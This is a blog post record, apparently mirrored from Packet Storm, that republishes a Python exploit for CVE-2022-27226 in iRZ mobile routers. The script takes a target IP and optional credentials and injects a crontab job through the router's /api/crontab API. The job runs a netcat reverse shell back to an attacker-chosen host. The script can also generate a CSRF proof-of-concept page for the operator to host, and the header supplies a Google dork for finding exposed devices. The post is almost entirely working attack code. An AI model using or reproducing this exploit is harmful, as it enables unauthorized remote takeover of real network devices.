{"id":22057,"date":"2022-03-22T19:49:12","date_gmt":"2022-03-22T15:49:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166396\/irzmr-xsrfexec.txt"},"modified":"2022-03-27T09:41:53","modified_gmt":"2022-03-27T05:11:53","slug":"irz-mobile-router-cross-site-request-forgery-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/irz-mobile-router-cross-site-request-forgery-remote-code-execution\/","title":{"rendered":"iRZ Mobile Router Cross Site Request Forgery \/ Remote Code Execution"},"content":{"rendered":"

# Exploit Title: iRZ Mobile Router – CSRF to RCE
\n# Google Dork: intitle:”iRZ Mobile Router”
\n# Date: 2022-03-18
\n# Exploit Author: Stephen Chavez & Robert Willis
\n# Vendor Homepage: https:\/\/en.irz.ru\/
\n# Software Link: https:\/\/github.com\/SakuraSamuraii\/ez-iRZ
\n# Version: Routers through 2022-03-16
\n# Tested on: RU21, RU21w, RL21, RU41, RL01
\n# CVE : CVE-2022-27226<\/p>\n

import os
\nimport requests
\nimport json
\nimport subprocess<\/p>\n

option = “0”<\/p>\n

def main():
\nprint(“####################################################”)
\nprint(“# Welcome to IRZ CSRF to RCE Exploit – version 1.0 #”)
\nprint(“####################################################”)
\nprint()
\nprint(“## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##”)
\nprint()
\nprint(“1. Post Authentication RCE (Needs Credentials)”)
\nprint(“2. CSRF to RCE (No Credentials)”)
\nprint()
\nrunit()<\/p>\n

def runit():
\noption = input(“Select an option: “)
\nif option == “1”:
\nexploit1()
\nelif option == “2”:
\nexploit2()
\nelse:
\nprint(“You must select ‘1’ or ‘2’. Exiting.”)<\/p>\n

def exploit1():
\nprint(“## Running Post Auth RCE exploit”)
\nprint()
\nprint()
\nrouter_ip = input(“## Enter the router ip to exploit: “)
\nrouter_port = int(
\ninput(“## Enter the victim router web page port (default is 80): “) or “80”)<\/p>\n

router_user = input(“## Enter the username for the router login: “)
\nrouter_pass = input(“## Enter the password for the router login: “)<\/p>\n

LHOST = input(“## Enter the LHOST for the router reverse shell: “)
\nLPORT = input(“## Enter the LPORT for the router reverse shell: “)<\/p>\n

router_url = f’http:\/\/{router_ip}:{router_port}’<\/p>\n

nc1_str = f’Start a listener with the following command: nc -lvp {LPORT}’<\/p>\n

input(nc1_str + “\\n\\nPress enter once you do”)<\/p>\n

send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)<\/p>\n

def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):<\/p>\n

intro = f’Sending the payload to {router_url}\\n’
\nprint(intro)
\npayload_str = ‘{“tasks”:[{“enable”:true,”minutes”:”*”,”hours”:”*”,”days”:”*”,”months”:”*”,”weekdays”:”*”,”command”:”rm \/tmp\/f;mknod \/tmp\/f p;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc ‘ + \\
\nf'{lhost_ip} {lhost_port} ‘ + \\
\n‘>\/tmp\/f”}],”_board”:{“name”:”RL21″,”platform”:”irz_mt02″,”time”:”Wed Mar 16 16:43:20 UTC 2022″}}’<\/p>\n

payload_json = json.loads(payload_str)<\/p>\n

s = requests.Session()<\/p>\n

s.auth = (router_user, router_pass)<\/p>\n

s.headers.update(
\n{“User-Agent”: “Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36”})
\ns.headers.update({“X-Requested-With”: “XMLHttpRequest”})
\ns.headers.update({“Origin”: router_url})
\ns.headers.update({“Referer”: router_url})<\/p>\n

s.post(router_url + “\/api\/crontab”, json=payload_json)<\/p>\n

exploit_str = f’rm \/tmp\/f;mknod \/tmp\/f p;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc {lhost_ip} 443 >\/tmp\/f’<\/p>\n

print(
\n“Request sent! You may have to wait about 2 minutes to get a shell. \\nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: ” + exploit_str)
\nprint(“To fix TTY: type telnet 0.0.0.0 in the shell”)<\/p>\n

def exploit2():<\/p>\n

print(“## Running CSRF to RCE exploit”)
\nprint()
\nprint()
\nrouter_ip = input(“## Enter the router ip to exploit: “)
\nrouter_port = int(
\ninput(“## Enter the victim router web page port (default is 80): “) or “80”)<\/p>\n

LHOST = input(“## Enter the LHOST for the router reverse shell: “)
\nLPORT = input(“## Enter the LPORT for the router reverse shell: “)<\/p>\n

load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)<\/p>\n

def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):<\/p>\n

file_path = os.path.dirname(__file__) + os.sep + “poc.template.html”<\/p>\n

if os.path.isfile(file_path):
\nwith open(file_path) as poc_file:
\noriginal_poc_data_str = poc_file.read()<\/p>\n

new_html = original_poc_data_str.replace(“{router_ip}”, router_ip)
\nnew_html = new_html.replace(
\n“{router_port}”, str(router_port))<\/p>\n

lhost_split_arr = lhost_ip.split(“.”)<\/p>\n

if len(lhost_split_arr) == 4:<\/p>\n

new_html = new_html.replace(
\n“{lhost_ip_octect_1}”, lhost_split_arr[0])<\/p>\n

new_html = new_html.replace(
\n“{lhost_ip_octect_2}”, lhost_split_arr[1])<\/p>\n

new_html = new_html.replace(
\n“{lhost_ip_octect_3}”, lhost_split_arr[2])
\nnew_html = new_html.replace(
\n“{lhost_ip_octect_4}”, lhost_split_arr[3])<\/p>\n

new_html = new_html.replace(
\n“{lhost_port}”, lhost_port)<\/p>\n

new_file_path = os.path.dirname(
\n__file__) + os.sep + “poc.new.html”
\ntry:
\nwith open(new_file_path, ‘w’) as new_file:
\nnew_file.write(new_html)<\/p>\n

print()
\nprint(
\nf’New file written to {new_file_path}. Host this file’)
\nexcept FileNotFoundError:
\nprint(“You had an error writing to the file, doesn’t exist.”)
\nelse:
\nprint(f'{lhost_ip} is not a proper IPV4 address.’)<\/p>\n

else:
\nprint(f'{file_path} not found’)<\/p>\n

main()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: iRZ Mobile Router – CSRF to RCE # Google Dork: intitle:”iRZ Mobile Router” # Date: 2022-03-18 # Exploit Author: Stephen Chavez & Robert Willis # Vendor Homepage: https:\/\/en.irz.ru\/ # Software Link: https:\/\/github.com\/SakuraSamuraii\/ez-iRZ # Version: Routers through 2022-03-16 # Tested on: RU21, RU21w, RL21, RU41, RL01 # CVE : CVE-2022-27226 import os import …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-22057","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=22057"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22057\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=22057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=22057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=22057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}